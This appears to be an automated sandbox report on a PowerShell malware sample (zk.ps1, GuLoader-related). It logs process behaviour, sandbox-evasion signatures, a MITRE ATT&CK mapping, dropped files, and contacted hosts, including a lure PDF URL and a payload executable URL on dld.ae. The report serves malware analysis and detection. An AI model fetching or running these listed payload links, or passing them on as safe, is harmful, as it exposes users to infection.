Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\wusb.batProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Opens the same file many times (likely Sandbox evasion)
Source: C:\Users\Public\wusb.batFile opened: C:\Users\user\Videos\Tonishly\Unitten\Hyoscyamine.ini count: 49915Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9810Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\wusb.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
Source: C:\Users\Public\wusb.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
Source: C:\Users\Public\wusb.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\wusb.batAPI call chain: ExitProcess graph end nodegraph_2-4937
Source: C:\Users\Public\wusb.batAPI call chain: ExitProcess graph end nodegraph_2-4942
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.511334823.000001CDDA6A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCult%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\wusb.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\wusb.bat "C:\Users\Public\wusb.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\Public\wusb.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		121
Masquerading		1
Input Capture		1
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts11
Process Injection		121
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials3
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 879708 Sample: zk.ps1 Startdate: 01/06/2023 Architecture: WINDOWS Score: 56 6 powershell.exe 17 21 2->6         started        dnsIp3 28 www.bluemaxxlaser.com 203.175.174.69, 49718, 80 SGGS-AS-APSGGSSG Singapore 6->28 30 dld.ae 84.16.234.51, 443, 49717 LEASEWEB-DE-FRA-10DE Germany 6->30 32 www.dld.ae 6->32 22 C:\Users\Public\wusb.bat, PE32 6->22 dropped 36 Drops PE files to the user root directory 6->36 38 Powershell creates an autostart link 6->38 40 Powershell drops PE file 6->40 11 wusb.bat 1 42 6->11         started        16 AcroRd32.exe 15 37 6->16         started        18 conhost.exe 6->18         started        file4 signatures5 process6 dnsIp7 34 192.168.2.1 unknown unknown 11->34 24 C:\Users\user\AppData\Local\...\System.dll, PE32 11->24 dropped 26 C:\Users\user\AppData\...\SharpDX.DXGI.dll, PE32 11->26 dropped 42 Opens the same file many times (likely Sandbox evasion) 11->42 20 RdrCEF.exe 62 16->20         started        file8 signatures9 process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
zk.ps111%ReversingLabsWin32.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\wusb.bat3%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsr743A.tmp\System.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
dld.ae0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://www.blumo4maxxlasmo4r.com/rh/List%20of%20rmo4quirmo4d%20itmo4ms%20and%20smo4rvicmo4s.pdf0%Avira URL Cloudsafe
http://www.oruddho.com0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
https://www.dld.ae/zp/zpeu.exe0%Avira URL Cloudsafe
https://www.dld.ae0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dld.ae
84.16.234.51
truefalseunknown
www.bluemaxxlaser.com
203.175.174.69
truefalse
    		unknown
    www.dld.ae
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://www.dld.ae/zp/zpeu.exefalse
      • Avira URL Cloud: safe
      		unknown
      http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD25B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.oruddho.comwusb.bat, 00000002.00000003.429172905.00000000027D4000.00000004.00000020.00020000.00000000.sdmp, bn.txt.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000000.00000002.447373146.000001CDC3EDA000.00000004.00000800.00020000.00000000.sdmptrue
          • URL Reputation: safe
          		unknown
          http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.447373146.000001CDC3518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.447373146.000001CDC3529000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD25B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.blumo4maxxlasmo4r.com/rh/List%20of%20rmo4quirmo4d%20itmo4ms%20and%20smo4rvicmo4s.pdfpowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmp, zk.ps1true
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000000.00000002.506986091.000001CDD246D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://nsis.sf.net/NSIS_ErrorErrorwusb.bat, 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wusb.bat, 00000002.00000000.418227016.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wusb.bat.0.drfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.447373146.000001CDC2401000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.447373146.000001CDC2608000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.dld.aepowershell.exe, 00000000.00000002.447373146.000001CDC2E07000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  203.175.174.69
                  		www.bluemaxxlaser.comSingapore
                  		24482SGGS-AS-APSGGSSGfalse
                  84.16.234.51
                  		dld.aeGermany
                  		28753LEASEWEB-DE-FRA-10DEfalse

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:37.1.0 Beryl
                  Analysis ID:879708
                  Start date and time:2023-06-01 12:13:10 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 42s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:zk.ps1
                  Detection:MAL
                  Classification:mal56.evad.winPS1@13/63@3/3
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 62.2% (good quality ratio 60.7%)
                  • Quality average: 88.3%
                  • Quality standard deviation: 21.8%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 66
                  • Number of non-executed functions: 33
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1

                  Warnings

                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 2.21.22.155, 2.21.22.179, 23.36.224.131
                  • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, acroipm2.adobe.com
                  • Execution Graph export aborted for target powershell.exe, PID 5768 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  12:14:21API Interceptor44x Sleep call for process: powershell.exe modified
                  12:14:37API Interceptor1x Sleep call for process: RdrCEF.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  203.175.174.69zpeu.exeGet hashmaliciousGuLoaderBrowse
                  • bluemaxxlaser.com/rh/rheu.bin
                  as.ps1Get hashmaliciousGuLoaderBrowse
                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                  84.16.234.51as.ps1Get hashmaliciousGuLoaderBrowse
                    RFQ - Scan36711006.exeGet hashmaliciousAgentTesla, zgRATBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.bluemaxxlaser.comas.ps1Get hashmaliciousGuLoaderBrowse
                      • 203.175.174.69

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SGGS-AS-APSGGSSGzpeu.exeGet hashmaliciousGuLoaderBrowse
                      • 203.175.174.69
                      as.ps1Get hashmaliciousGuLoaderBrowse
                      • 203.175.174.69
                      Fe7MaP3DNP.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.10
                      Demon.x86.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.55
                      tebjuOp0kK.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.35
                      7Hhy4dfkst.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.31
                      5HzazUnnF6.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.75
                      4M3ACl2k2v.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.47
                      wget.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.29
                      chB6z5L2GD.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.10
                      86iDRbpkXb.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.72
                      yC34ftIroi.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.68
                      http://singaporeoptometricassociation.com/Get hashmaliciousUnknownBrowse
                      • 203.175.162.79
                      PiuV0y8Fw8.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.49
                      BvZi2Dj3LS.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.26
                      q44S0kQ3wZ.exeGet hashmaliciousAgentTesla, VidarBrowse
                      • 203.175.174.68
                      SecuriteInfo.com.Win32.PWSX-gen.18409.25600.exeGet hashmaliciousAgentTeslaBrowse
                      • 203.175.168.182
                      #U260e#Ufe0f E-Fax-Invoice.htmGet hashmaliciousHTMLPhisherBrowse
                      • 203.175.162.6
                      https://faxcorporation1.od2.vtiger.com/pages/new_fax_receievedGet hashmaliciousHTMLPhisherBrowse
                      • 203.175.162.6
                      aJF1hL1hAJ.dllGet hashmaliciousWannacryBrowse
                      • 124.6.37.129

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9adas.ps1Get hashmaliciousGuLoaderBrowse
                      • 84.16.234.51
                      file.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Cobro_Juridico_Historial_de_pago.vbsGet hashmaliciousNjrat, PasteDownloaderBrowse
                      • 84.16.234.51
                      PO20230247.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.ps1Get hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      main.ps1Get hashmaliciousKDOT TOKEN GRABBERBrowse
                      • 84.16.234.51
                      AEJR1569.jsGet hashmaliciousNetSupport RATBrowse
                      • 84.16.234.51
                      https://docs.google.com/drawings/d/1yyXXrwkMe93YDIykPC-d3JWZ3X37agPJMgGC3eIiv0w/previewGet hashmaliciousHTMLPhisherBrowse
                      • 84.16.234.51
                      npp.8.5.3.Installer.x64342423423423424242423423424.batGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Pagamento.jsGet hashmaliciousClipboard Hijacker, QuasarBrowse
                      • 84.16.234.51
                      rBillofLading05-25-2023.exeGet hashmaliciousAveMariaBrowse
                      • 84.16.234.51
                      SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      02705399.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      02705399.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      HIOY0568.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Voucher_Booking_Reservation_Detail_09888846348.vbsGet hashmaliciousAsyncRATBrowse
                      • 84.16.234.51
                      06472899.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllzpeu.exeGet hashmaliciousGuLoaderBrowse
                        zpeu.exeGet hashmaliciousGuLoaderBrowse
                          as.ps1Get hashmaliciousGuLoaderBrowse
                            KwP6qU3cQ8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              KwP6qU3cQ8.exeGet hashmaliciousGuLoaderBrowse
                                DB948GHBNJI.xlsxGet hashmaliciousGuLoaderBrowse
                                  Order-new world foods.xlsxGet hashmaliciousGuLoaderBrowse
                                    8cAZneRN6B.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      8cAZneRN6B.exeGet hashmaliciousGuLoaderBrowse
                                        fr34veeTGm.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          fr34veeTGm.exeGet hashmaliciousGuLoaderBrowse
                                            ShipmentReceipt9521368040.xlsxGet hashmaliciousGuLoaderBrowse
                                              njUIPPVrud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                njUIPPVrud.exeGet hashmaliciousGuLoaderBrowse
                                                  ShipmentReceipt93213628045.xlsxGet hashmaliciousGuLoaderBrowse

                                                    Created / dropped Files

                                                    C:\Users\Public\wusb.bat

                                                    Download File
